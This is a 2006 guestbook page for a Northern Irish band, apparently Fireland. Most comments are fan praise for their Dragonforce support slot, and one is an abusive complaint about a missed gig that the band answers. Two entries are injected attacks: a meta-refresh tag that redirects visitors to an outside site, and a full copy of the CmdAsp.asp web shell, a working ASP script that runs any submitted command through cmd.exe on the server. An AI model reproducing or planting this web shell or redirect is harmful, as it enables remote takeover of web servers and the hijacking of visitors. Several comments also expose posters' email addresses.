| FROM: SYNCHESTRA | 17 Nov 2006 |
Comments: You guys rocked supporting Dragonforce on Thursday.
Rock On!
|
| FROM: TIMOTHY CHAMBERS | 17 Nov 2006 |
Email: chambers515@btinternet.com From: Timbo Comments: Just wanna say that you guys ROCKED supporting Dragonforce on thursday, i think i speak for most people there when i say you far surpassed all our expectations :). Can`t wait to get my hands on your EP!
|
| FROM: LUKE MCCLAY | 17 Nov 2006 |
Email: lukemcclay@hotmail.co.uk Comments: Hey it is luke jake can`t wait for the dragonforce concert.
|
| FROM: NATHAN SCOTT | 16 Nov 2006 |
Email: michealmyer78@hotmail.co.uk Comments: u r amazing best band in ni
|
| FROM: NEW FAN | 14 Nov 2006 |
Email: what_you_say@hotmail.co.uk From: belfast Comments: i recently started listining to ur music and it is amazing i cant wait to see u guys with dragonforce... hope its a good show
|
| FROM: RIFF | 12 Nov 2006 |
Email: XOA@AOL.COM From: FUCKED OFF Comments: YOU FUCKING USELESS BASTARDS IF YOU WHERE NOT GOING TO PLAY THE ROSIE GIG ON THE 11TH OF NOVEMBER LIKE YOU SAID WOULD ON YOUR WEBSITE WHY DID YOU NOT DISPLAY IT AS CANCELLED SOME PEOPLE MADE A GREAT EFFORT TO BE THERE ONLY TO BE DISAPOINTED BY YOU NOT BEING THERE... SO FUCK YOU!!!!!!!!!!!!!!
Fireland say: Sorry about that... we've since fired the webmaster and hired a monkey instead! Hopefully he'll do a better job!
|
| FROM: AAA AA | 7 Oct 2006 |
Email: ceza_bu_kral@hotmail.com From: turkey Comments: <meta http-equiv="refresh" content="2;URL=http://ari33n.ar.funpic.org">
|
| FROM: TOM | 14 May 2006 |
Website: http://www.freewebs.com/waitingforandrew Comments: great show on friday.you were amazing
|
| FROM: WARREN BELL | 16 Apr 2006 |
Email: ! From: ! Comments: Damn that human? question!
|
| FROM: SAMIR | 3 Apr 2006 |
Email: lol@mail.ru From: Samir Comments: <++ CmdAsp.asp ++> <%@ Language=VBScript %> <% ` --------------------o0o-------------------- ` File: CmdAsp.asp ` Author: Maceo <maceo @ dogmile.com> ` Release: 2000-12-01 ` OS: Windows 2000, 4.0 NT ` -------------------------------------------
Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile
On Error Resume Next
` -- create the COM objects that we will be using -- ` Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
` -- check for a command that we have posted -- ` szCMD = Request.Form(".CMD") If (szCMD <> "") Then
` -- Use a poor man`s pipe ... a temp file -- ` szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%> <HTML> <BODY> <FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> <input type=text name=".CMD" size=45 value="<%= szCMD %>"> <input type=submit value="Run"> </FORM> <PRE> <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> <br> <% If (IsObject(oFile)) Then ` -- Read the output from our command and remove the temp file -- ` On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If %> </BODY> </HTML> <-- CmdAsp.asp -->
|